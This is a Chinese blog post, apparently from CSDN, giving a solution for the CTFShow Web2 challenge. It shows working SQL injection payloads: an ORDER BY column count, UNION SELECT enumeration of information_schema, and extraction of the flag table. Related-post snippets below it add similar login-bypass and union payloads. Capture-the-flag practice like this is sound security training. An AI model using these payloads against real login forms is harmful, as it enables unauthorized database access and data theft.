CTFshow WEB 2 题解

已于 2025-02-06 12:24:11 修改
阅读量478 收藏 10
点赞数 9
分类专栏: CTFshow 题解 文章标签: 数据库 oracle sql
于 2025-02-05 13:12:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kater_1/article/details/145452967
版权

一、题目介绍

CTFShow Web2 是一道 SQL 注入相关的题目,考察选手对 SQL 注入(特别是 UNION SELECT 语句)的掌握程度。解题的关键在于通过 SQL 注入获取数据库结构,并最终提取 flag。

二、题目分析

打开靶场发现只有一个登录框想到可能登录框内存在sql注入于是我们进行尝试,目标是利用 UNION SELECT 语句枚举数据库中的表、列,并获取存储的 flag。

三、解题过程(包括关键点、工具、代码等)

1.先判断有可查询的字段数

我们首先需要确定查询语句的字段数量,以确保 UNION SELECT 语句能够正确执行。在用户名输入框中尝试输入以下语句:

' or 1=1 order by 3#
' or 1=1 order by 4#

发现 ORDER BY 3 正常,而 ORDER BY 4 时报错,说明查询的字段数为 3

2.获取数据库表名

确认字段数后,我们利用 UNION SELECT 语句查询当前数据库下的所有表名:

' OR 1=1 UNION SELECT 1, GROUP_CONCAT(table_name), 3 FROM information_schema.tables WHERE table_schema=database()#

后发现当前数据库下有两个表:flaguser

3. 获取 flag 表的列名

接着,我们对 flag 表进行注入,查询其列名:

' OR 1=1 UNION SELECT 1, GROUP_CONCAT(column_name), 3 FROM information_schema.columns WHERE table_schema=database() AND table_name='flag'#

查询结果显示 flag 表下的列名也是 flag

4. 读取 flag 表中的数据

现在我们可以直接查询 flag 表中的内容,获取 flag:

' OR 1=1 UNION SELECT 1, flag, 3 FROM flag#

成功获取 flag。

四、题目总结

总的来说该题是一个简单的sql注入类型题目,主要考察 UNION SELECT 结合 information_schema 进行数据库信息枚举的能力。掌握这类 SQL 注入方法,在 CTF 和实际渗透测试中都非常有用。

ctfshow——web(持续更新)
qq_55202378的博客
10-27 756
查看源代码: base64编码特征:大小写+数字,偶尔最后几位是=。登录界面,先测一下是不是存在SQL注入漏洞 SQL注入常见的测试方法就是:再用sqlmap去跑数据库里的内容:(这里直接跑数据包) 看到函数,这一题应该是与文件包含有关。是包含GET传参中url参数的值,那么可以考虑php伪协议中的input协议和data协议。 关于php://input和data://text/plain,简单来说:故,poc:
CTFshow_web2
zoixsoadji的博客
02-28 2363
进入题目,发现题目很简单,首先试试万能密码登陆。 登陆成功,接下来使用bp抓包,并且寻找注入点。 找到注入点,接下来看看它的2下面有什么 查到表名为web2数据库,接下来继续注入,查询字段。 查找到了flag和user两个数据表,接下来查询字段 最后查询字段内容,得到flag 本人萌新,大佬手下留情 >_< ...
CTFShow-WEB-web2解题过程
MoSiZh的博客
11-26 392
ctfshowwebweb2解题过程
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
CTFshow-web-web2
qq_68581192的博客
10-07 215
获取flag表的字段,输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段。获取flag表的数据,1’ union select 1,(select flag from flag),3 # 显示如下。
CTFshowWEB2
精神大火的博客
03-21 1623
该题考察SQL注入漏洞,之前对SQL注入仅有部分了解,通过该题进行复习深入。
ctfshow-web2
HAI_WD的博客
07-24 395
知道这里是sql注入,确认一下是什么类型的闭合。可以知道闭合是单引号闭合,然后查一下显示的位数。这道题很多wp,但是为了完整性还是写一下。然后知道库了之后,锁定一下数据表。
CTF秀web2
天天学安全专属博客
11-20 1121
CTF秀web2,union注入详解
2024年CTFSHOW-Web入门题解(更新中)
2401_84252743的博客
05-01 650
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ctfshow web入门题解(一) web1-10
weixin_48604668的博客
07-26 1810
ctfshow靶场的web vip题解前10道
ctfshow web入门题解(二) web11-20
weixin_48604668的博客
08-01 1464
ctfshow的vip题解 希望对各位师傅有所帮助
ctfshow web34题解
最新发布
04-03
### CTFShow Web 第34题 解题思路 #### 背景分析 CTFShow 平台中的 Web 类别题目通常涉及漏洞利用、代码审计以及安全防护机制绕过等内容。对于第34题,可以从已知的参考资料中提取关键信息并结合常见 Web 安全挑战...
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 2104
自用
CTFshow Web2
Lig_HossssT的博客
10-09 502
’ or 1=1 union select 1,database(),3# 查阅数据库得到数据库web2’ ’ or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema=‘web2’#查数据表 ’ or 1=1 union select 1,column_name,3 from information_schema.columns where table_name=‘flag’#查字...
ctfshow web2
2301_78160233的博客
12-01 940
登录界面首先想到了burp重放攻击密码爆破,用常见字典爆一下,爆不出来就算了,毕竟题目大概不会考字典容量。然后就是测试万能密码进入admin' 1=1 #(用户名处)or:这是一个SQL逻辑运算符,用来连接两个条件。如果第一个条件为假,那么只要第二个条件为真,整个表达式就为真。1=1:这是一个始终为真的条件。在SQL中,1=1总是返回真(true),因此,无论用户名和密码是什么,只要这个条件存在,整个表达式就会被认为是真的。:这是一个注释符号,在SQL中,任何。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值